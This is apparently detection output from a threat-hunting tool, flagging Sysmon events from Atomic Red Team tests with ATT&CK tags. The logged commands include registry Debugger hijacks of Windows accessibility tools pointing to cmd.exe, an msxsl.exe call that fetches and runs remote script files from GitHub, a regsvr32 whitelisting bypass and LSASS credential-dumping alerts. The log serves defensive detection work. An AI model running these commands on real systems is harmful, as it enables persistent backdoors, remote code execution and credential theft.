+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547856.04777,2019-07-19T18:50:56.047770+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3762 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:55.978 + 747F3D96-D8CF-5D31-0000-00109B603300 + 5380 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list" + C:\AtomicRedTeam\ + 
MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1563547856.04777,2019-07-19T18:50:56.047770+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3762 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:55.978 + 747F3D96-D8CF-5D31-0000-00109B603300 + 5380 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547855.991996,2019-07-19T18:50:55.991996+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3761 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + 
+ + + + 2019-07-19 14:50:53.038 + 747F3D96-D8CD-5D31-0000-001047543300 + 1852 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547853.062635,2019-07-19T18:50:53.062635+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3760 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:52.989 + 747F3D96-D8CC-5D31-0000-001038513300 + 948 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547853.011281,2019-07-19T18:50:53.011281+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3759 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:50.067 + 747F3D96-D8CA-5D31-0000-0010CF443300 + 6268 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547850.086593,2019-07-19T18:50:50.086593+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3758 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:50.029 + 
747F3D96-D8CA-5D31-0000-0010DA413300 + 4004 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1563547850.046476,2019-07-19T18:50:50.046476+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ams15s30-in-f4.1e100.net ) , IP ( 172.217.17.132 ) and port ( 80 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 3757 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-19 14:50:20.871 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49727 + + false + 172.217.17.132 + ams15s30-in-f4.1e100.net + 80 + http + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547825.37603,2019-07-19T18:50:25.376030+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3756 + 
+ + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:19.533 + 747F3D96-D8AB-5D31-0000-0010A4D53200 + 1888 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547819.491237,2019-07-19T18:50:19.491237+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3753 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:19.455 + 747F3D96-D8AB-5D31-0000-001054D03200 + 6244 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547819.467476,2019-07-19T18:50:19.467476+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3752 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:18.000 + 747F3D96-D8AA-5D31-0000-0010C0C93200 + 6016 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547817.963904,2019-07-19T18:50:17.963904+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3749 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + 
+ + + + 2019-07-19 14:50:17.916 + 747F3D96-D8A9-5D31-0000-001072C43200 + 6068 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547817.941637,2019-07-19T18:50:17.941637+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3748 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:14.762 + 747F3D96-D8A6-5D31-0000-0010F9B13200 + 6664 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + 
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547814.692289,2019-07-19T18:50:14.692289+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3745 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:14.649 + 747F3D96-D8A6-5D31-0000-001053A73200 + 6888 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547814.678185,2019-07-19T18:50:14.678185+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3744 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:13.173 + 747F3D96-D8A5-5D31-0000-0010C0A03200 + 6116 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows 
Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547813.127595,2019-07-19T18:50:13.127595+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3741 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:13.096 + 747F3D96-D8A5-5D31-0000-0010729B3200 + 4212 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + 
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547813.109148,2019-07-19T18:50:13.109148+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3740 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:10.306 + 747F3D96-D8A2-5D31-0000-0010D8943200 + 2484 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547810.282757,2019-07-19T18:50:10.282757+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3737 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:10.253 + 747F3D96-D8A2-5D31-0000-00108A8F3200 + 6156 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Image File Execution "Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547810.26663,2019-07-19T18:50:10.266630+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3736 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:07.335 + 747F3D96-D89F-5D31-0000-0010BC823200 + 2404 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1003 ] Credential Dumping ImageLoad,1603194669.842764,2020-10-20T15:51:09.842764+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 1103 + + + + + Microsoft-Windows-Sysmon/Operational + DESKTOP-NTSSLJD + + + + + - + 2020-10-20 
11:51:09.588 + 23F38D93-CEB4-5F8E-9F08-000000000C00 + 9392 + C:\Windows\System32\mmc.exe + C:\Windows\System32\samlib.dll + 10.0.18362.1049 (WinBuild.160101.0800) + SAM Library DLL + Microsoft® Windows® Operating System + Microsoft Corporation + SAMLib.DLL + SHA1=508CE06737747BC14DF3A4337F8A63B76472C629,MD5=0B4202913B86A44A0FAE7B80D425CDF8,SHA256=3501320367877A6EC814CAB179D329D41E32748F01973F5A053D5801DFC9594B,IMPHASH=3B8923EB77916A851639B50DFA19881B + true + Microsoft Windows + Valid + +",DESKTOP-NTSSLJD,Microsoft-Windows-Sysmon/Operational +[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1603194669.842764,2020-10-20T15:51:09.842764+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 1103 + + + + + Microsoft-Windows-Sysmon/Operational + DESKTOP-NTSSLJD + + + + + - + 2020-10-20 11:51:09.588 + 23F38D93-CEB4-5F8E-9F08-000000000C00 + 9392 + C:\Windows\System32\mmc.exe + C:\Windows\System32\samlib.dll + 10.0.18362.1049 (WinBuild.160101.0800) + SAM Library DLL + Microsoft® Windows® Operating System + Microsoft Corporation + SAMLib.DLL + SHA1=508CE06737747BC14DF3A4337F8A63B76472C629,MD5=0B4202913B86A44A0FAE7B80D425CDF8,SHA256=3501320367877A6EC814CAB179D329D41E32748F01973F5A053D5801DFC9594B,IMPHASH=3B8923EB77916A851639B50DFA19881B + true + Microsoft Windows + Valid + +",DESKTOP-NTSSLJD,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548027.083068,2019-07-19T18:53:47.083068+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4046 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:46.938 + 747F3D96-D97A-5D31-0000-00102BE33800 + 4628 + C:\Windows\System32\cmd.exe + 
10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1563548026.975169,2019-07-19T18:53:46.975169+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll)",1," + + + + + 1 + 5 